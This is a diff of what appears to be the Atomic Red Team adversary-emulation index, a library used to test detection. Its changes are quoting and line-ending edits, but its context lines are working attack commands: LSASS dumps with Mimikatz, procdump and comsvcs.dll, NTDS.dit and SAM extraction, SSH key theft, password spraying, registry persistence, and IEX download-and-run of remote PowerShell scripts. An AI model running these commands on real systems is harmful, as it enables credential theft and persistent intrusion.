-' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -15949,7 +15997,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -15966,7 +16014,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -15977,7 +16025,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" @@ -16114,7 +16162,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -16420,7 +16468,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -16440,22 +16488,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1547.009: technique: @@ -16524,7 +16572,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -16623,10 +16671,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1542.001: @@ -16802,7 +16850,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -17264,13 +17312,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed -' + ' prereq_command: 'Get-TransportAgent -TransportService FrontEnd -' + ' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -' + ' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -17512,10 +17560,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) -' + ' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -17524,10 +17572,10 @@ persistence: executor: command: 'xcopy #{web_shells} #{web_shell_path} -' + ' cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 -' + ' name: command_prompt T1546.003: technique: @@ -17787,10 +17835,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -17823,10 +17871,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -17922,11 +17970,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -17945,11 +17993,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -17971,7 +18019,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell credential-access: T1003.008: @@ -18032,7 +18080,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -18051,7 +18099,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh T1557.002: technique: @@ -18266,7 +18314,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture -' + ' supported_platforms: - linux - macos @@ -18288,7 +18336,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} -' + ' name: sh T1110: technique: @@ -18561,7 +18609,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -18577,10 +18625,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" @@ -18735,14 +18783,14 @@ credential-access: executor: command: 'python2 laZagne.py all -' + ' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files -' + ' supported_platforms: - macos - linux @@ -18754,14 +18802,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} -' + ' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -18837,7 +18885,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -18848,7 +18896,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) @@ -18856,7 +18904,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore -' + ' name: powershell T1555.003: technique: @@ -18967,11 +19015,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -19019,10 +19067,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) -' + ' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -19087,7 +19135,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -19105,7 +19153,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s -' + ' name: command_prompt T1003.006: technique: @@ -19219,7 +19267,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -19520,7 +19568,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -19648,7 +19696,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -19753,26 +19801,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml -' + ' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -19797,25 +19845,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} -' + ' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | . #{gpp_script_path} @@ -20161,7 +20209,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -20179,11 +20227,11 @@ credential-access: \n" prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -20502,10 +20550,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -' + ' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) @@ -20544,10 +20592,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -20557,7 +20605,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -20572,10 +20620,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -20598,10 +20646,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) -' + ' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} @@ -20609,7 +20657,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -20652,10 +20700,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) @@ -20671,19 +20719,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) -' + ' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" -' + ' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" -' + ' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit -' + ' name: command_prompt elevation_required: true - name: LSASS read with pypykatz @@ -20700,35 +20748,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live lsa -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -20743,10 +20791,10 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1''); get-process lsass | Out-Minidump -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -20774,10 +20822,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -20787,7 +20835,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Powershell Mimikatz @@ -20809,7 +20857,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds -' + ' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -20831,15 +20879,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 -' + ' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" -' + ' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -20849,7 +20897,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} -' + ' name: powershell elevation_required: true T1557: @@ -21053,19 +21101,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -21092,34 +21140,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' - description: 'Volume shadow copy must exist -' + ' prereq_command: 'if not exist #{vsc_name} (exit /b 1) -' + ' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vassadmin''" to fulfuill this requirement -' + ' - description: 'Extract path must exist -' + ' prereq_command: 'if not exist #{extract_path} (exit /b 1) -' + ' get_prereq_command: 'mkdir #{extract_path} -' + ' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ -21151,22 +21199,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -21185,19 +21233,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -21360,15 +21408,15 @@ credential-access: dependencies: - description: 'Check if at least one of the tools are installed on the machine. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; -' + ' executor: command: | tcpdump -c 5 -nnni #{interface} @@ -21392,15 +21440,15 @@ credential-access: dependencies: - description: 'Check if at least one of the tools are installed on the machine. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; -' + ' executor: command: "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n" @@ -21433,7 +21481,7 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} @@ -21441,7 +21489,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -21603,10 +21651,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) -' + ' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -21816,7 +21864,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -21829,14 +21877,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -21928,7 +21976,7 @@ credential-access: description: 'Creates username and password files then attempts to brute force on remote host -' + ' supported_platforms: - windows input_arguments: @@ -21964,7 +22012,7 @@ credential-access: description: 'Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -22110,13 +22158,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt -' + ' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) -' + ' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat -' + ' executor: name: command_prompt elevation_required: false @@ -22124,7 +22172,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL -' + ' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -22145,7 +22193,7 @@ credential-access: -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force -' + ' - name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d @@ -22335,14 +22383,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key -' + ' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. -' + ' supported_platforms: - macos - linux @@ -22361,14 +22409,14 @@ credential-access: find #{search_path} -name id_dsa >> #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. -' + ' supported_platforms: - linux input_arguments: @@ -22387,14 +22435,14 @@ credential-access: find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} -' + ' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -22414,7 +22462,7 @@ credential-access: find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh T1003.007: technique: @@ -22536,42 +22584,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials -' + ' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live registry -' + ' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -22597,12 +22645,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} -' + ' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 -' + ' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -23279,7 +23327,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} -' + ' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -23450,10 +23498,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -23463,10 +23511,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -23486,10 +23534,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -23527,11 +23575,11 @@ collection: dependencies: - description: 'Winzip must be installed -' + ' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' -' + ' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -23551,7 +23599,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation -' + ' supported_platforms: - windows input_arguments: @@ -23566,10 +23614,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) -' + ' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -23588,7 +23636,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. -' + ' supported_platforms: - linux - macos @@ -23605,30 +23653,30 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) -' + ' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo Please set input_files argument to include files that exist -' + ' executor: name: sh elevation_required: false command: 'zip #{output_file} #{input_files} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -23648,16 +23696,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) -' + ' cleanup_command: 'rm -f #{input_file}.gz -' + ' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -23673,28 +23721,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) -' + ' prereq_command: 'test -e 